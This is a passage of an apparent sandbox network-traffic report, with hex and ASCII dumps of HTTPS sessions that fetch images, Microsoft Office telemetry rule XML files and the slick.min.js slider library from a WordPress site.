                                                                                                                                          2024-11-28 10:33:14 UTC7911INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 03 03 03 05 04 05 09 06 06 09 0d 0a 09 0a 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c2 00 11 08 00 fa 00 fa 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 00 05 06 07 08 09 ff c4 00 1a 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 e0 3c bf 5d 1d
                                                                                                                                          Data Ascii: JFIFCC<]
                                                                                                                                          2024-11-28 10:33:14 UTC8000INData Raw: b6 2d bb c0 c0 d0 d9 e9 b6 93 6b 0c 6c 76 16 d8 49 32 16 df b2 6d 1e 0f aa 1d b6 ec f5 28 10 d7 34 b4 63 1b a6 f7 4d 38 88 7b 45 cf de 8b 7b 08 94 d8 b8 d6 13 b0 12 e6 68 4a ef 74 85 39 14 09 87 19 cc aa 85 b7 dc bc 7a 95 da 70 a8 52 09 c5 16 7f 8b 68 ad 5b 6a a9 3b 1b c3 28 ec d8 88 a6 d0 ed ef b4 89 5e 75 aa f5 9b ed 56 ae cf 6a f3 cc f6 af 3a cf 68 5e 75 9f ec 17 9c 67 b4 2f 38 cf 68 59 e5 90 53 c9 35 b4 cd ef 8a 16 21 bd ed 04 77 ad c7 19 d7 9a 21 d5 09 66 bd 81 18 6b 9e 3b 0e 9c e5 06 b5 f5 03 f9 63 4e 63 aa 3b 15 ac e0 aa 53 75 6c 74 6a 08 73 32 c4 de e2 a9 d2 34 77 58 20 07 b1 3e a3 29 b7 09 bd 4a 20 e5 dc 16 f4 d2 a5 c5 87 99 ef 52 d3 d1 bf fa 47 23 eb 40 55 c2 23 aa d0 a6 38 c7 93 68 4d a6 e7 bc d6 3b ce c1 9b 49 ec 28 d3 7e d7 55 b7 97 1c 0d 43
                                                                                                                                          Data Ascii: -klvI2m(4cM8{E{hJt9zpRh[j;(^uVj:h^ug/8hYS5!w!fk;cNc;Sultjs24wX >)J RG#@U#8hM;I(~UC
                                                                                                                                          2024-11-28 10:33:14 UTC8000INData Raw: 2c 47 71 40 53 7b ab 0b e7 79 23 8b ca e6 22 00 93 19 51 06 b0 f7 e9 4d 62 54 06 60 36 46 58 ef f9 62 8e fe 60 95 21 f1 85 c0 0d ab 39 52 e2 8a 15 f5 18 16 4d 65 cc 2d a3 72 3b f4 4e 90 48 d9 d3 08 5a cf dd 80 04 30 e9 1d 2b 81 5b 86 4c f9 c1 ec 1d 0c 44 b3 4e c8 66 50 bd 0b d7 ad b3 f5 d2 8e 2f 0a cd 83 d1 ec ee ec e4 6b 5c d6 f6 fa 70 c6 d0 ed 9b 1e b8 a7 72 81 a0 e8 60 06 75 c9 83 d2 6a 8a e2 fd e1 9b b5 12 2b 54 87 ec bf ed 4f f6 f6 ce 5d 6f a0 e4 cf b4 e3 94 b4 9f 8e e6 ac 6e 95 f8 0d 5a 64 29 a8 f2 4c c5 da ac 79 68 38 90 88 47 44 2d b6 e0 2f 79 b0 26 b2 d1 83 bc b7 62 cb 0c e4 1f 64 8a 57 83 82 cf 4e 97 fd c7 5a 82 d7 01 5b 8b 84 77 62 23 71 6b ff c4 00 27 11 00 03 00 01 04 00 06 03 01 01 01 00 00 00 00 00 00 01 11 21 10 31 41 51 61 71 81 91 a1 f0
                                                                                                                                          Data Ascii: ,Gq@S{y#"QMbT`6FXb`!9RMe-r;NHZ0+[LDNfP/k\pr`uj+TO]onZd)Lyh8GD-/y&bdWNZ[wb#qk'!1AQaq
                                                                                                                                          2024-11-28 10:33:14 UTC3533INData Raw: 32 86 43 35 bd aa 15 da 09 ba de 2d dd 2a 9a 6c 1a 4e b8 a7 86 46 7c a4 b5 19 40 17 80 d3 b8 e0 2d 67 82 c4 45 fa 9c 2f 58 4b 62 e9 56 d0 a9 02 72 11 4e 7e ea e0 14 45 1a 9d bd 91 d2 43 5a 72 5c af 04 d2 3f 43 4f 77 03 9b 1e 45 63 24 11 cb cf 38 4e c3 7f 82 2d 81 a4 af c4 c2 5c c0 e2 96 15 90 1a f0 f7 dc 36 47 17 67 a6 d1 8d 2b 1f 19 cd a4 4b 21 9d 08 1b 1d d3 c4 cb 14 bd c0 4b 01 0a 71 39 e2 49 8e d6 26 f7 53 b0 29 ec dd e3 8e 12 c9 41 bc 69 82 e8 02 0e b2 6f b8 32 6d 0d 8f 2c d6 06 74 81 00 3a 8f 6d a2 78 72 e7 00 64 1d 22 98 ba 6b c6 0f 7a 8f 1b 58 cd 0d f7 63 c4 c6 d2 9b 6d 6a 08 1d 74 df c8 c2 03 7a 9d 13 d8 b1 d7 06 99 b9 6e 33 a6 87 f1 19 0c ca ab e7 98 97 44 20 11 f0 01 14 91 f8 72 5e 04 02 f4 41 74 0f 38 9b 68 c2 68 10 a9 4d 50 38 77 00 d9 db dd
                                                                                                                                          Data Ascii: 2C5-*lNF|@-gE/XKbVrN~ECZr\?COwEc$8N-\6Gg+K!Kq9I&S)Aio2m,t:mxrd"kzXcmjtzn3D r^At8hhMP8w


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          118192.168.2.44988113.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:14 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:14 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 472
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                          ETag: "0x8DC582B9D43097E"
                                                                                                                                          x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103314Z-174f7845968vqt9xhC1EWRgten0000000yc0000000003qkk
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:14 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          119192.168.2.44988213.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:14 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:14 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 427
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                          ETag: "0x8DC582BA909FA21"
                                                                                                                                          x-ms-request-id: 27d1d277-c01e-0014-7129-40a6a3000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103314Z-174f7845968xlwnmhC1EWR0sv80000000y60000000002z6n
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:14 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          120192.168.2.44988313.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:14 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:15 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 486
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                          ETag: "0x8DC582B92FCB436"
                                                                                                                                          x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103315Z-174f7845968jrjrxhC1EWRmmrs0000000ydg000000005u5n
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          121192.168.2.4498845.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:14 UTC414OUTGET /wp-content/plugins/tailor/assets/js/dist/vendor/slick.min.js?ver=1.8.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:15 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:15 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 13 Mar 2018 12:53:50 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 50225
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:15 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:15 UTC7876INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 66 61 63 74 6f 72 79 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 66 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 7b 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 61 63 74 6f 72 79 29 7d 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 66 61 63 74 6f 72 79 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 7d 65 6c 73 65 7b 66 61 63 74 6f 72 79 28 6a 51 75 65 72 79 29 7d 7d 29 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 53 6c 69 63 6b 3d 77 69 6e 64 6f 77 2e 53 6c 69 63 6b 7c 7c
                                                                                                                                          Data Ascii: (function(factory){"use strict";if(typeof define==="function"&&define.amd){define(["jquery"],factory)}else if(typeof exports!=="undefined"){module.exports=factory(require("jquery"))}else{factory(jQuery)}})(function($){"use strict";var Slick=window.Slick||
                                                                                                                                          2024-11-28 10:33:15 UTC8000INData Raw: 6c 65 64 22 3a 22 74 72 75 65 22 2c 74 61 62 69 6e 64 65 78 3a 22 2d 31 22 7d 29 7d 7d 7d 3b 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 75 69 6c 64 44 6f 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 3d 74 68 69 73 2c 69 2c 64 6f 74 3b 69 66 28 5f 2e 6f 70 74 69 6f 6e 73 2e 64 6f 74 73 3d 3d 3d 74 72 75 65 26 26 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 3e 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 29 7b 5f 2e 24 73 6c 69 64 65 72 2e 61 64 64 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 64 6f 74 74 65 64 22 29 3b 64 6f 74 3d 24 28 22 3c 75 6c 20 2f 3e 22 29 2e 61 64 64 43 6c 61 73 73 28 5f 2e 6f 70 74 69 6f 6e 73 2e 64 6f 74 73 43 6c 61 73 73 29 3b 66 6f 72 28 69 3d 30 3b 69 3c 3d 5f 2e 67 65 74 44 6f 74 43 6f 75 6e 74 28 29
                                                                                                                                          Data Ascii: led":"true",tabindex:"-1"})}}};Slick.prototype.buildDots=function(){var _=this,i,dot;if(_.options.dots===true&&_.slideCount>_.options.slidesToShow){_.$slider.addClass("slick-dotted");dot=$("<ul />").addClass(_.options.dotsClass);for(i=0;i<=_.getDotCount()
                                                                                                                                          2024-11-28 10:33:15 UTC8000INData Raw: 2e 72 65 6d 6f 76 65 28 29 7d 7d 69 66 28 5f 2e 24 73 6c 69 64 65 73 29 7b 5f 2e 24 73 6c 69 64 65 73 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 73 6c 69 64 65 20 73 6c 69 63 6b 2d 61 63 74 69 76 65 20 73 6c 69 63 6b 2d 63 65 6e 74 65 72 20 73 6c 69 63 6b 2d 76 69 73 69 62 6c 65 20 73 6c 69 63 6b 2d 63 75 72 72 65 6e 74 22 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 64 61 74 61 2d 73 6c 69 63 6b 2d 69 6e 64 65 78 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 24 28 74 68 69 73 29 2e 61 74 74 72 28 22 73 74 79 6c 65 22 2c 24 28 74 68 69 73 29 2e 64 61 74 61 28 22 6f 72 69 67 69 6e 61 6c 53 74 79 6c 69 6e 67 22 29 29 7d 29 3b 5f 2e 24 73 6c 69 64 65 54 72
                                                                                                                                          Data Ascii: .remove()}}if(_.$slides){_.$slides.removeClass("slick-slide slick-active slick-center slick-visible slick-current").removeAttr("aria-hidden").removeAttr("data-slick-index").each(function(){$(this).attr("style",$(this).data("originalStyling"))});_.$slideTr
                                                                                                                                          2024-11-28 10:33:15 UTC8000INData Raw: 73 61 67 65 3a 22 70 72 65 76 69 6f 75 73 22 7d 2c 5f 2e 63 68 61 6e 67 65 53 6c 69 64 65 29 3b 5f 2e 24 6e 65 78 74 41 72 72 6f 77 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 73 6c 69 63 6b 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 73 6c 69 63 6b 22 2c 7b 6d 65 73 73 61 67 65 3a 22 6e 65 78 74 22 7d 2c 5f 2e 63 68 61 6e 67 65 53 6c 69 64 65 29 7d 7d 3b 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 44 6f 74 45 76 65 6e 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 3d 74 68 69 73 3b 69 66 28 5f 2e 6f 70 74 69 6f 6e 73 2e 64 6f 74 73 3d 3d 3d 74 72 75 65 26 26 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 3e 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 29 7b 24 28 22 6c 69 22 2c 5f 2e 24 64 6f 74 73 29 2e 6f 6e 28 22 63 6c 69 63 6b
                                                                                                                                          Data Ascii: sage:"previous"},_.changeSlide);_.$nextArrow.off("click.slick").on("click.slick",{message:"next"},_.changeSlide)}};Slick.prototype.initDotEvents=function(){var _=this;if(_.options.dots===true&&_.slideCount>_.options.slidesToShow){$("li",_.$dots).on("click
                                                                                                                                          2024-11-28 10:33:15 UTC8000INData Raw: 73 48 61 6e 64 6c 65 72 28 29 3b 5f 2e 70 61 75 73 65 64 3d 21 5f 2e 6f 70 74 69 6f 6e 73 2e 61 75 74 6f 70 6c 61 79 3b 5f 2e 61 75 74 6f 50 6c 61 79 28 29 3b 5f 2e 24 73 6c 69 64 65 72 2e 74 72 69 67 67 65 72 28 22 72 65 49 6e 69 74 22 2c 5b 5f 5d 29 7d 3b 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 73 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 3d 74 68 69 73 3b 0a 69 66 28 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 21 3d 3d 5f 2e 77 69 6e 64 6f 77 57 69 64 74 68 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 5f 2e 77 69 6e 64 6f 77 44 65 6c 61 79 29 3b 5f 2e 77 69 6e 64 6f 77 44 65 6c 61 79 3d 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 5f 2e 77 69 6e 64 6f 77 57 69 64 74 68 3d
                                                                                                                                          Data Ascii: sHandler();_.paused=!_.options.autoplay;_.autoPlay();_.$slider.trigger("reInit",[_])};Slick.prototype.resize=function(){var _=this;if($(window).width()!==_.windowWidth){clearTimeout(_.windowDelay);_.windowDelay=window.setTimeout(function(){_.windowWidth=
                                                                                                                                          2024-11-28 10:33:15 UTC8000INData Raw: 7b 69 66 28 5f 2e 6f 70 74 69 6f 6e 73 2e 63 65 6e 74 65 72 4d 6f 64 65 3d 3d 3d 74 72 75 65 29 7b 69 6e 66 69 6e 69 74 65 43 6f 75 6e 74 3d 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2b 31 7d 65 6c 73 65 7b 69 6e 66 69 6e 69 74 65 43 6f 75 6e 74 3d 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 7d 66 6f 72 28 69 3d 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 3b 69 3e 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 2d 69 6e 66 69 6e 69 74 65 43 6f 75 6e 74 3b 69 2d 3d 31 29 7b 73 6c 69 64 65 49 6e 64 65 78 3d 69 2d 31 3b 24 28 5f 2e 24 73 6c 69 64 65 73 5b 73 6c 69 64 65 49 6e 64 65 78 5d 29 2e 63 6c 6f 6e 65 28 74 72 75 65 29 2e 61 74 74 72 28 22 69 64 22 2c 22 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 73 6c 69 63 6b 2d 69 6e 64 65
                                                                                                                                          Data Ascii: {if(_.options.centerMode===true){infiniteCount=_.options.slidesToShow+1}else{infiniteCount=_.options.slidesToShow}for(i=_.slideCount;i>_.slideCount-infiniteCount;i-=1){slideIndex=i-1;$(_.$slides[slideIndex]).clone(true).attr("id","").attr("data-slick-inde
                                                                                                                                          2024-11-28 10:33:15 UTC2349INData Raw: 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 3d 74 68 69 73 3b 69 66 28 5f 2e 24 73 6c 69 64 65 73 43 61 63 68 65 21 3d 3d 6e 75 6c 6c 29 7b 5f 2e 75 6e 6c 6f 61 64 28 29 3b 5f 2e 24 73 6c 69 64 65 54 72 61 63 6b 2e 63 68 69 6c 64 72 65 6e 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 29 2e 64 65 74 61 63 68 28 29 3b 5f 2e 24 73 6c 69 64 65 73 43 61 63 68 65 2e 61 70 70 65 6e 64 54 6f 28 5f 2e 24 73 6c 69 64 65 54 72 61 63 6b 29 3b 5f 2e 72 65 69 6e 69 74 28 29 7d 7d 3b 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 75 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 3d 74 68 69 73 3b 24 28 22 2e 73 6c 69 63 6b 2d 63 6c 6f 6e 65 64 22 2c 5f 2e 24 73 6c 69 64 65 72 29 2e 72 65 6d 6f 76 65 28 29 3b 69 66 28 5f 2e 24 64 6f 74 73 29
                                                                                                                                          Data Ascii: nction(){var _=this;if(_.$slidesCache!==null){_.unload();_.$slideTrack.children(this.options.slide).detach();_.$slidesCache.appendTo(_.$slideTrack);_.reinit()}};Slick.prototype.unload=function(){var _=this;$(".slick-cloned",_.$slider).remove();if(_.$dots)


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          122192.168.2.4498865.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:15 UTC648OUTGET /wp-content/themes/tentamus-labor/images/MemberTagFooter.png?v=2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:16 UTC280INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:15 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Oct 2021 10:15:54 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 10409
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:15 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/png
                                                                                                                                          2024-11-28 10:33:16 UTC7912INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 f5 00 00 00 2a 08 06 00 00 00 6b d9 1d 9f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 1b 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 64 61 62 61 63 62 62 2c 20 32 30 32 31 2f 30 34 2f 31 34 2d 30 30 3a 33 39 3a 34 34 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52
